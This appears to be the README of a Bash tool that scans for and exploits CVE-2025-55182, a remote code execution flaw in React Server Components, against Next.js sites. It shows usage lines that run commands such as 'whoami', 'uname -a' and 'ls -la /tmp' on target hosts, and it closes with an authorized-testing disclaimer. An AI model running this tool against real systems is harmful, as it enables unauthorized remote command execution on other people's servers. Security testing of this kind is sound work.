
Scanner baseado em Bash para detecção e exploração do CVE-2025-55182 (React Server Components RCE) em aplicações Next.js. Suporta execução de comandos personalizados e varredura de URLs.
Ferramenta simples de linha de comando para detectar e explorar a CVE-2025-55182 (RCE em Componentes de Servidor React) em aplicações Next.js.

chmod +x scanner.sh
# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"
-d, --domain - Domínio/URL alvo (obrigatório)-c, --command - Comando a executar (padrão: id)# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"
Esta ferramenta é apenas para fins educacionais e de testes de segurança autorizados. Não a utilize contra sistemas que você não possui ou para os quais não tem permissão para testar.